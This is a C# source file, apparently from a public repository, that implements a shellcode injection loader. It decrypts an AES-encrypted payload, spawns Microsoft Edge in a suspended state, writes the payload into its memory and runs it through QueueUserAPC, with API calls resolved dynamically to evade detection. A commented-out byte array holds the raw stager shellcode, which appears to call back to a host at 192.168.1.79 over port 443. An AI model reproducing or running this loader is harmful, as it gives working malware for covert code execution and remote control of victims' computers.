-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathProgram.cs
129 lines (104 loc) · 12.1 KB
/
Program.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
using System;
using System.Text;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace DynamicInvoke
{
public static class Program
{
// spawn MSEdge
public static string ProcessToSpawn = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe";
public static string ProcessArgs = @"--profile-directory=Default";
public static string startDir = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application";
public enum Protection
{
PAGE_NOACCESS = 0x01,
PAGE_READONLY = 0x02,
PAGE_READWRITE = 0x04,
PAGE_WRITECOPY = 0x08,
PAGE_EXECUTE = 0x10,
PAGE_EXECUTE_READ = 0x20,
PAGE_EXECUTE_READWRITE = 0x40,
PAGE_EXECUTE_WRITECOPY = 0x80,
PAGE_GUARD = 0x100,
PAGE_NOCACHE = 0x200,
PAGE_WRITECOMBINE = 0x400
}
static bool ByteArrayCompare(byte[] a1, byte[] a2)
{
if (a1.Length != a2.Length)
return false;
for (int i = 0; i < a1.Length; i++)
if (a1[i] != a2[i])
return false;
return true;
}
public static void Main(string[] args)
{
string shellcode = "N3yNZmtoK8uLHVZPs4zQgJ7CjFogrJvDxoXxZE4HmhPH0gXUTgMHuRJkUEoaEzryDmYApP4yTmxSDpNJt7bto0MgW6b99EOO9ZJa93CBB6XrIEg4H77/6oM2zJizdCAB0kPOvi+4iKyTevFK66SAb5v+0DUGKqF7xzLyuAypq+OYP9Yz6/ZRdvytcNYNtaAl6sn8a1huM4s/95aGJX+JXxr8u1MrBjxtaAB6PfuOlrGn5Z6WhrBl2ZbL9FZIkkUfS0k1EqFgun+jEE+YgcJwI9+DtSubcY0B9CJyENvTOMBTapi+E582eNTemj0eNQSO6GqnTi6hswwENqG+YO3YTImT9T9qOzcbJH+d2B2ECi9kcltXoLBPcUDjQNTfQLEnxA7gTLjBJgy4ck5//LPy+GxzZ0cZ/m5c7N/LyZ/Xicyhm5A+g+Q+hNUMJYwzp6hC8UGOFNbhRNbFlpqm8unUVJtbYxR9JVfizZ+ro0nmzwK+h1iKMSrTNHMgoDuOIoOlozsnSCr1beHTHGDxxlFySJI+0TeTM6y0gFkQSj0Ip1PcYL/Vv2H9bO7Vw3YEp11JAL6nr2Rbs4NdRu+2eHZ0jllUJ+xyQJetQ1vR+aNjQL4fCpJ2lYXsPSGs9od9XcrE9Clq4pSVa9Nnds46/yUeS5ofPpdQzjIVNAjxKZJQuYRdZPZATCgrG7YcQg2iMEydE/jcbIK6uA1UWLR0Z/32dzDtYVSghKAgQAuwdjtn5eJUo//KrV2zSHHHuayWoCIaxa9FwyS3NnfXE+kagL9G7/PdyMOMbvCIt2YSfTRM7DVewt8Qll4CDY64fk7TClLeASi6I3c+BhElMadZDxDq24uC0bNMmGhHX1j/OsPMBlw53DhUWh6Q5Gnp8kG5RU8CQ9R6QqX8IxPgBxXVRDwDC7tTYK2e2u66ZPVGPF45rgnUBbmQZsM1icnXAKYLW7SZ6LpejVF4F3OKNO8ORg9IHP4k0hHUAq0tOe3KvtGowNLsrOX/Zz1KDRXJ4WyHzk7ONtmJ3fzlf9jin6VJLpeuuOoh4Pzw4ZLXlWTlAaBRQ0t0BlNnVNS8ZFNcfhAo1AXJmQOP7VfVFBfg4SikhQvUMFY+gwWlWiJSlHO0dZgbDKizlD3ceMqv6C9f7uKzlJC5IuRpSTppSzoLpkPywIv2GTcn2UBJ7OqPR+YFcdyG7B1FvOysyst5vVPFhsnnSJ0y4nK6onTSnw72KOADDJWNQQ==";
string shellkey = "XxjpkQJ5lK91czeMOo248FKuegl4rrQc";
byte[] tempKey = Encoding.ASCII.GetBytes(shellkey);
tempKey = SHA256.Create().ComputeHash(tempKey);
byte[] tempIV = new byte[16];
Buffer.BlockCopy(tempKey, 0, tempIV, 0, 16);
// to encrypt shellcode, use:
//byte[] raw_beacon = new byte[926] { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x72, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x4f, 0xff, 0xff, 0xff, 0x5d, 0x6a, 0x00, 0x49, 0xbe, 0x77, 0x69, 0x6e, 0x69, 0x6e, 0x65, 0x74, 0x00, 0x41, 0x56, 0x49, 0x89, 0xe6, 0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0x48, 0x31, 0xd2, 0x4d, 0x31, 0xc0, 0x4d, 0x31, 0xc9, 0x41, 0x50, 0x41, 0x50, 0x41, 0xba, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x93, 0x00, 0x00, 0x00, 0x5a, 0x48, 0x89, 0xc1, 0x41, 0xb8, 0xbb, 0x01, 0x00, 0x00, 0x4d, 0x31, 0xc9, 0x41, 0x51, 0x41, 0x51, 0x6a, 0x03, 0x41, 0x51, 0x41, 0xba, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x79, 0x5b, 0x48, 0x89, 0xc1, 0x48, 0x31, 0xd2, 0x49, 0x89, 0xd8, 0x4d, 0x31, 0xc9, 0x52, 0x68, 0x00, 0x32, 0xc0, 0x84, 0x52, 0x52, 0x41, 0xba, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x48, 0x89, 0xc6, 0x48, 0x83, 0xc3, 0x50, 0x6a, 0x0a, 0x5f, 0x48, 0x89, 0xf1, 0xba, 0x1f, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x68, 0x80, 0x33, 0x00, 0x00, 0x49, 0x89, 0xe0, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xba, 0x75, 0x46, 0x9e, 0x86, 0xff, 0xd5, 0x48, 0x89, 0xf1, 0x48, 0x89, 0xda, 0x49, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff, 0x4d, 0x31, 0xc9, 0x52, 0x52, 0x41, 0xba, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x85, 0x9d, 0x01, 0x00, 0x00, 0x48, 0xff, 0xcf, 0x0f, 0x84, 0x8c, 0x01, 0x00, 0x00, 0xeb, 0xb3, 0xe9, 0xe4, 0x01, 0x00, 0x00, 0xe8, 0x82, 0xff, 0xff, 0xff, 0x2f, 0x36, 0x39, 0x75, 0x79, 0x00, 0x96, 0xcf, 0x96, 0x39, 0xb3, 0x80, 0x0f, 0xb9, 0x08, 0x29, 0x69, 0x56, 0x74, 0x8f, 0x5b, 0xc5, 0x94, 0xc2, 0xa0, 0x4a, 0x77, 0xb0, 0x8a, 0x95, 0xc7, 0x27, 0xfe, 0xdb, 0x83, 0xd1, 0xfc, 0x11, 0x53, 0xb9, 0xef, 0x63, 0xa6, 0xd2, 0xf7, 0xdb, 0x84, 0xa3, 0x41, 0x4d, 0xb2, 0x7c, 0x09, 0x1e, 0x5b, 0x9e, 0xc5, 0x16, 0x1d, 0x89, 0x11, 0xbc, 0x86, 0xf7, 0x60, 0xf5, 0x9d, 0x4a, 0xdd, 0x7b, 0xa3, 0x1a, 0xee, 0x3a, 0x9c, 0x29, 0xbb, 0x89, 0xe5, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x34, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x37, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x30, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x34, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0xda, 0xe8, 0xfa, 0xef, 0x6c, 0x8a, 0x0b, 0x49, 0x18, 0xac, 0x2f, 0x40, 0xab, 0x1f, 0xd5, 0x5e, 0x6a, 0x41, 0x7d, 0x4c, 0x8e, 0xb0, 0xf5, 0xe0, 0xa0, 0x71, 0xf0, 0x38, 0xcb, 0x6b, 0x3b, 0x7b, 0x2c, 0x2f, 0x81, 0x02, 0x3f, 0x8c, 0xf5, 0xb6, 0xe7, 0xdf, 0x6c, 0x1f, 0xdb, 0x9f, 0xc7, 0x7d, 0xf0, 0x7b, 0x2b, 0x71, 0x51, 0x95, 0x36, 0x7b, 0xf0, 0xcb, 0x10, 0x20, 0x74, 0x09, 0x1c, 0x0a, 0xaa, 0x13, 0x56, 0x1e, 0x73, 0xeb, 0xe9, 0x55, 0x0f, 0x76, 0xa5, 0x65, 0x8f, 0x30, 0x59, 0x0e, 0xee, 0xf2, 0x02, 0x71, 0x14, 0x43, 0x31, 0xbc, 0xdf, 0x37, 0x3c, 0x2d, 0x8f, 0x5e, 0x58, 0x7a, 0x61, 0xf1, 0x22, 0xe3, 0xc7, 0x0a, 0x22, 0xe6, 0xb8, 0xaf, 0x1e, 0x15, 0xb0, 0x0a, 0x23, 0xe0, 0x79, 0x80, 0xd2, 0x71, 0xcb, 0xdc, 0x58, 0x5b, 0x3b, 0x0a, 0x0c, 0xd4, 0x02, 0x1d, 0x22, 0x74, 0xe5, 0x2d, 0x0f, 0x1c, 0xcc, 0x75, 0xcf, 0xfc, 0x30, 0x53, 0xbc, 0xeb, 0xb0, 0x76, 0x5c, 0xfb, 0xbb, 0x3b, 0x9f, 0x28, 0x49, 0xc6, 0x33, 0xfe, 0x8e, 0x91, 0x13, 0x49, 0xfa, 0x44, 0x64, 0x86, 0xf1, 0x4a, 0x2a, 0x7f, 0x78, 0xbe, 0x1c, 0x43, 0xa5, 0xed, 0xdd, 0xab, 0x51, 0x6c, 0x30, 0x1e, 0xa1, 0x44, 0xc6, 0x39, 0x4a, 0x33, 0xad, 0xd1, 0x82, 0xe2, 0x3c, 0x7a, 0x47, 0xdf, 0xa3, 0x97, 0xb9, 0xaf, 0xdc, 0xef, 0xb9, 0x14, 0xce, 0x30, 0xc4, 0xfa, 0x4c, 0xa2, 0x8c, 0x45, 0xc7, 0x71, 0xf0, 0x5a, 0x5a, 0x9c, 0x2b, 0x31, 0x24, 0x89, 0x3f, 0x42, 0x72, 0x73, 0x5d, 0x15, 0x40, 0xa2, 0xd2, 0x00, 0x41, 0xbe, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0xba, 0x00, 0x00, 0x40, 0x00, 0x41, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x93, 0x53, 0x53, 0x48, 0x89, 0xe7, 0x48, 0x89, 0xf1, 0x48, 0x89, 0xda, 0x41, 0xb8, 0x00, 0x20, 0x00, 0x00, 0x49, 0x89, 0xf9, 0x41, 0xba, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x20, 0x85, 0xc0, 0x74, 0xb6, 0x66, 0x8b, 0x07, 0x48, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xd7, 0x58, 0x58, 0x58, 0x48, 0x05, 0x00, 0x00, 0x00, 0x00, 0x50, 0xc3, 0xe8, 0x7f, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x2e, 0x37, 0x39, 0x00, 0x3a, 0xde, 0x68, 0xb1 };
//string shellcode = Convert.ToBase64String(Crypto.Encrypt(buf2, tempKey, tempIV));
//return;
byte[] buf = Crypto.Decrypt(Convert.FromBase64String(shellcode), tempKey, tempIV);
IntPtr pointer;
// create the delegate references
pointer = Invoke.GetLibraryAddress("kernel32.dll", "CreateProcessA");
DELEGATES.CreateProcess CreateProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.CreateProcess)) as DELEGATES.CreateProcess;
pointer = Invoke.GetLibraryAddress("kernel32.dll", "VirtualAllocEx");
DELEGATES.VirtualAllocEx VirtualAllocEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.VirtualAllocEx)) as DELEGATES.VirtualAllocEx;
pointer = Invoke.GetLibraryAddress("kernel32.dll", "WriteProcessMemory");
DELEGATES.WriteProcessMemory WriteProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.WriteProcessMemory)) as DELEGATES.WriteProcessMemory;
pointer = Invoke.GetLibraryAddress("kernel32.dll", "VirtualProtectEx");
DELEGATES.VirtualProtectEx VirtualProtectEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.VirtualProtectEx)) as DELEGATES.VirtualProtectEx;
pointer = Invoke.GetLibraryAddress("kernel32.dll", "QueueUserAPC");
DELEGATES.QueueUserAPC QueueUserAPC = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.QueueUserAPC)) as DELEGATES.QueueUserAPC;
pointer = Invoke.GetLibraryAddress("kernel32.dll", "ResumeThread");
DELEGATES.ResumeThread ResumeThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ResumeThread)) as DELEGATES.ResumeThread;
// dynamically invoke the Win32 APIs
#if DEBUG
Console.WriteLine("[*] (DInvoke) CreateProcess");
#endif
STRUCTS.STARTUPINFO si = new STRUCTS.STARTUPINFO();
STRUCTS.PROCESS_INFORMATION pi = new STRUCTS.PROCESS_INFORMATION();
STRUCTS.SECURITY_ATTRIBUTES lpa = new STRUCTS.SECURITY_ATTRIBUTES();
STRUCTS.SECURITY_ATTRIBUTES lta = new STRUCTS.SECURITY_ATTRIBUTES();
bool result = CreateProcess(ProcessToSpawn, ProcessArgs, ref lpa, ref lta, false, STRUCTS.ProcessCreationFlags.CREATE_NEW_CONSOLE | STRUCTS.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, startDir, ref si, out pi);
#if DEBUG
Console.WriteLine("[*] Process ID: {0}", pi.dwProcessId);
Console.WriteLine("[*] Thread ID: {0}", pi.dwThreadId);
Console.WriteLine("[*] (DInvoke) VirtualAllocEx");
#endif
IntPtr addr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, (uint)buf.Length, 0x1000, Protection.PAGE_READWRITE);
#if DEBUG
Console.WriteLine("[*] Address: 0x{0}", addr.ToString("X"));
Console.WriteLine("[*] Protection: PAGE_READWRITE");
Console.WriteLine("[*] (DInvoke) WriteProcessMemory");
#endif
WriteProcessMemory(pi.hProcess, addr, buf, buf.Length, out IntPtr bytesWritten);
#if DEBUG
Console.WriteLine("[*] Written to Address: 0x{0}", addr.ToString("X"));
Console.WriteLine("[*] (DInvoke) VirtualProtectEx");
#endif
VirtualProtectEx(pi.hProcess, addr, buf.Length, Protection.PAGE_EXECUTE_READ, out Protection p);
#if DEBUG
Console.WriteLine("[*] Protection: PAGE_EXECUTE_READ");
Console.WriteLine("[*] (DInvoke) QueueUserAPC");
#endif
QueueUserAPC(addr, pi.hThread, IntPtr.Zero);
#if DEBUG
Console.WriteLine("[*] (DInvoke) ResumeThread: 0x{0}", pi.hThread.ToString("X"));
#endif
ResumeThread(pi.hThread);
#if DEBUG
Console.WriteLine("[*] We should have shellcode execution...");
Console.ReadKey();
#endif
}
}
}